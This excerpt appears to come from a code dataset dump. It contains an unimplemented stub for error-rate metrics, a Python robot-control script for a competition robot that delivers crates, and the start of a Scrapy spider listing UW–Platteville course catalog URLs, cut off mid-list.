] | 11 | 2021-10-05T14:02:26.000Z | 2021-11-25T22:02:56.000Z | # Don't forget to support cases when target_text == ''
def calc_cer(target_text, predicted_text) -> float:
# TODO: your code here
raise NotImplementedError()
def calc_wer(target_text, predicted_text) -> float:
# TODO: your code here
raise NotImplementedError()
| 25.454545 | 54 | 0.717857 | 37 | 280 | 5.243243 | 0.567568 | 0.154639 | 0.195876 | 0.237113 | 0.701031 | 0.701031 | 0.701031 | 0.701031 | 0.701031 | 0.701031 | 0 | 0 | 0.189286 | 280 | 10 | 55 | 28 | 0.854626 | 0.335714 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
81a0d2e6eedb45e93311b8fe7f7920a27f122306 | 15,888 | py | Python | Legobot Code/actions.py | dotcomstar/Incredibots2018 | 0227c07626428d264dc3b05ecc08926f0e85d25b | [
"MIT"
] | 4 | 2018-07-30T05:30:46.000Z | 2019-06-07T04:40:56.000Z | Legobot Code/actions.py | dotcomstar/Incredibots2018 | 0227c07626428d264dc3b05ecc08926f0e85d25b | [
"MIT"
] | null | null | null | Legobot Code/actions.py | dotcomstar/Incredibots2018 | 0227c07626428d264dc3b05ecc08926f0e85d25b | [
"MIT"
] | 1 | 2018-07-30T05:20:28.000Z | 2018-07-30T05:20:28.000Z | # The bulk of commands should go here
from wallaby import *
import constants as c
import movement as m
import linefollow as f
import webcam as w
crate_zone = 30 # In place for ease of GitHub compilation.
botguy_zone = 30 # Ditto to above.
def get_crates():
print "Starting get_crates()"
print "Bot in starting box\n"
f.drive_through_two_lines_third()
f.right_point_turn_until_black()
f.lfollow_right_until_left_senses_black_smooth_amount(.5, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.5 * c.BASE_LM_POWER), int (.5 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_right_until_left_senses_black_smooth_amount(.5, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.7 * c.BASE_LM_POWER), int (.7 * c.BASE_RM_POWER), c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_until_left_senses_black_smooth_amount(10, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.9 * c.BASE_LM_POWER), int (.9 * c.BASE_RM_POWER), c.BASE_LM_POWER, c.BASE_RM_POWER, False)
print "Bot on center tee\n"
if c.IS_MAIN_BOT:
m.drive_tics(1007, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
m.drive_tics(1120, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_third_senses_white(10, 0, 0, False)
f.right_point_turn_until_third_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.left_backwards_until_black()
f.right_backwards_until_black()
m.open_claw()
m.arm_slow(c.ARM_DOWN_POS)
m.claw_slow(c.CLAW_LESS_OPEN_POS)
m.backwards(1400)
print "Bot driving backwards to get crates\n"
m.close_claw()
print "\n\nFinished getting crates\n\n"
def approach_t():
print "Starting approach_t()"
f.right_point_turn_until_left_senses_black()
f.lfollow_left_inside_line_until_right_senses_black_smooth(15, 0, 0, False)
f.drive_through_line_left(2, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.align_far()
print "The robot has reached the 'T'"
def put_crates_in_correct_zone():
approach_t()
w.check_zones_full()
deliver_first_crate()
deliver_second_crate()
def deliver_first_crate():
print "Starting first_crate_delivery()"
m.drive(500)
if crate_zone == c.LEFT:
print "Starting deliver_left()"
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_left_senses_white(10, 0, 0, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.lfollow_left_until_right_senses_black_smooth(7)
if c.IS_MAIN_BOT:
f.right_point_turn_until_black_after(c.RIGHT_TURN_TIME, 0, 0, False)
f.right_point_turn_until_white(1, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
else: # Clone bot
f.right_point_turn_until_black_after(c.RIGHT_TURN_TIME)
elif crate_zone == c.MIDDLE:
print "Starting deliver_middle()"
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_white(10, 0, 0, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.lfollow_right_until_left_senses_black_smooth(7)
f.drive_until_white_left()
f.right_forwards_until_left_senses_black(10, 0, False)
f.right_forwards_until_left_senses_white(10, c.BASE_RM_POWER)
f.lfollow_left_inside_line_until_right_senses_black_smooth(10, 0, 0, False)
#f.left_forwards_until_black()
f.drive_until_white_right(2, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
if c.IS_MAIN_BOT:
f.lfollow_left_inside_line_smooth(2.5, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
f.lfollow_left_inside_line_smooth(2.7, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.turn_left()
f.align_in_zone_safely()
f.drive_through_line_third(10, 0, 0, False)
m.drive(700, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
elif crate_zone == c.RIGHT:
print "Starting deliver_right()"
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_white(10, 0, 0, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.lfollow_right_until_left_senses_black_smooth(7)
f.left_point_turn_until_black_after(c.LEFT_TURN_TIME, 0, 0, False)
f.left_point_turn_until_white(1, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
m.backwards(200)
m.arm_slow(c.ARM_DOWN_POS)
msleep(300) # This pause helps keep the second crate from tipping over
m.claw_slow(c.CLAW_LARGE_OPEN_POS)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 2, 1)
m.backwards(500)
print "First crate delivered\n\n"
def deliver_second_crate():
print "Starting second_crate_delivery()"
m.drive(250)
m.arm_slow(c.ARM_SECOND_CRATE_GRAB_POS, 2, 1)
m.backwards(100)
m.claw_slow(c.CLAW_SECOND_CRATE_GRAB_POS, 3, 1)
m.lift_arm(c.ARM_SECOND_CRATE_UP_POS)
m.wait(100)
if crate_zone == c.LEFT:
f.left_point_turn_until_black()
if c.IS_MAIN_BOT:
f.lfollow_left_smooth_amount(.7, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.5 * c.BASE_LM_POWER), int (.5 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_left_smooth(.8, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
f.lfollow_left_smooth(1.5)
f.left_point_turn_until_right_senses_black()
f.lfollow_right_inside_line_until_left_senses_black_smooth_amount(1, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.4 * c.BASE_LM_POWER), int (.4 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_right_inside_line_until_left_senses_black_smooth(10, 0, 0, False)
m.drive(150, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.turn_right()
f.align_in_zone_safely()
elif crate_zone == c.MIDDLE:
f.right_point_turn_until_black()
f.lfollow_right_smooth(1.5)
f.right_point_turn_until_left_senses_black()
f.lfollow_left_inside_line_until_right_senses_black_smooth_amount(1, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.4 * c.BASE_LM_POWER), int (.4 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_left_inside_line_until_right_senses_black_smooth(10, 0, 0, False)
m.drive(180, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_black(5, 0, 0, False)
f.right_point_turn_until_white(5, c.BASE_LM_POWER, -1* c.BASE_RM_POWER, False)
f.right_point_turn_until_black(5, c.BASE_LM_POWER, -1* c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(5, c.BASE_LM_POWER, -1* c.BASE_RM_POWER, False)
m.turn_right(c.RIGHT_TURN_TIME, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.align_in_zone_safely()
elif crate_zone == c.RIGHT:
f.drive_until_white_third(10, 0, 0, False)
m.drive(300, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_black()
f.lfollow_right(3)
f.right_point_turn_until_left_senses_black()
f.lfollow_left_inside_line_until_right_senses_black_smooth_amount(2, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.4 * c.BASE_LM_POWER), int (.4 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_left_inside_line_until_right_senses_black_smooth(10, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.drive(200, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.turn_left()
f.align_in_zone_safely()
f.drive_through_line_third(10, 0, 0, False)
m.drive(800, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.arm_slow(c.ARM_SECOND_CRATE_DEPOSIT_POS, 2, 1)
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 2, 1)
m.backwards(600)
msleep(10)
m.drive(200)
m.arm_slow(c.ARM_HIGH_POS, 2, 1)
print "Second crate delivered\n\n"
def get_botguy():
print "Starting get_botguy()"
if crate_zone == c.LEFT:
print "I'm in the left zone and going to botguy"
f.drive_through_line_left() # Bot on middle line
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(20, 0, 0, False)
f.drive_until_white(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_until_third_senses_black_smooth(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.drive_tics(300, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_third_senses_white(5 * c.LEFT_TURN_TIME, 0, 0)
elif crate_zone == c.MIDDLE:
print "I'm in the middle zone and going to botguy"
m.turn_right()
m.drive(1500)
m.turn_left()
f.drive_through_line_left() # Bot on middle line
f.align_far()
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(20, 0, 0, False)
f.drive_until_white(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_until_third_senses_black_smooth(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.drive_tics(300, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_third_senses_white(5 * c.LEFT_TURN_TIME, 0, 0)
elif crate_zone == c.RIGHT:
print "I'm in the right zone and going to botguy"
f.drive_through_line_left() # Bot on middle line
f.align_far()
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(20, 0, 0, False)
if c.IS_MAIN_BOT:
m.drive_tics(1007, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
m.drive_tics(1120, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_third_senses_white(5 * c.RIGHT_TURN_TIME / 1000, 0, 0, False)
f.right_point_turn_until_third_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
else:
print "What zone am I in again? I have no idea. This is an error message"
print "You already know I'm guessing it's in that right zone tho\n"
exit(86)
f.left_backwards_until_black()
f.right_backwards_until_black()
m.open_claw(c.CLAW_BOTGUY_OPEN_POS)
m.arm_slow(c.ARM_DOWN_POS)
#f.right_point_turn_until_third_senses_black() # To do: Run more tests on this command
f.lfollow_backwards_smooth(4.5)
m.arm_slow(c.ARM_UP_POS)
m.backwards(490)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 2, 1)
m.close_claw(c.CLAW_CLOSE_POS)
m.arm_slow(c.ARM_DOWN_POS)
m.backwards(100)
m.close_claw(c.BOTGUY_CLAW_CLOSE_POS)
print "Finished getting botguy\n\n"
def put_botguy_on_side():
print "Starting put_botguy_on_side()"
approach_t()
f.right_point_turn_until_third_senses_black(.2)
f.drive_until_white_third(5, 0, 0, False)
m.drive(300, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_left_senses_black(10, 0, 0, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
def put_botguy_in_correct_zone():
approach_t()
f.right_point_turn_until_third_senses_black(.2)
print "Starting deliver_botguy()"
if botguy_zone == c.LEFT:
print "Starting deliver_left()"
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_left_senses_white(10, 0, 0, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.lfollow_left_until_right_senses_black_smooth(7)
f.right_point_turn_until_black_after(c.RIGHT_TURN_TIME, 0, 0, False)
m.turn_right(int (c.RIGHT_TURN_TIME / 2), c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
elif botguy_zone == c.MIDDLE:
print "Starting deliver_middle()"
f.drive_until_white_third(5, 0, 0, False)
m.drive(300, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_black(10, 0, 0, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.backwards_through_line_left()
f.align_close()
if False: # crate_zone == c.LEFT:
m.turn_right(int (c.RIGHT_TURN_TIME / 8))
m.backwards(900)
m.turn_right(int (c.RIGHT_TURN_TIME / 10))
elif False: # crate_zone == c.RIGHT:
m.turn_left(int (c.LEFT_TURN_TIME / 8))
m.backwards(900)
m.turn_left(int (c.LEFT_TURN_TIME / 20))
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
m.backwards(1000)
elif botguy_zone == c.RIGHT:
print "Starting deliver_right()"
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_white(10, 0, 0, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.lfollow_right_until_left_senses_black_smooth(7)
m.turn_left(c.LEFT_TURN_TIME, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.turn_left(c.LEFT_TURN_TIME, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.turn_left(int (c.LEFT_TURN_TIME / 2), -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 3, 1)
m.backwards(300)
print "Botguy delivered\n\n"
| 52.96 | 192 | 0.717586 | 2,853 | 15,888 | 3.556607 | 0.064143 | 0.098059 | 0.068986 | 0.118262 | 0.849611 | 0.817286 | 0.795605 | 0.782497 | 0.730659 | 0.699517 | 0 | 0.032025 | 0.180451 | 15,888 | 299 | 193 | 53.137124 | 0.747254 | 0.02612 | 0 | 0.539568 | 0 | 0 | 0.052155 | 0.002912 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.017986 | null | null | 0.097122 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
81bfa720b7d30a66fb8d8f12a20ce0311d7b181d | 32,495 | py | Python | UW_Platteville/plateville_links/plateville_links/spiders/get_links3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Platteville/plateville_links/plateville_links/spiders/get_links3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Platteville/plateville_links/plateville_links/spiders/get_links3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null |
from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from plateville_links.items import PlatevilleLinksItem
class plateville_links( scrapy.Spider ):
name = 'plateville_links3'
allowed_domains = ['uwplatt.edu']
start_urls = [
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BIOLOGY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BUSADMIN/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CHEMSTRY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COMPUTER/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COUNSED/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ECONOMIC/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENGLISH/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ETHNSTDY/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGINDUS/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGSCI/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ART/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOGRPHY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOLOGY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GERMAN/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHLSPHY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHSC/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHYSICS/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/POLISCI/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PSYCHLGY/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MATH/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MEDIA/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUAP/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUSIC/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SOCIOLGY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPANISH/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPEECH/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/TEACHING/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/THEATRE/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HHP/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HISTORY/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", 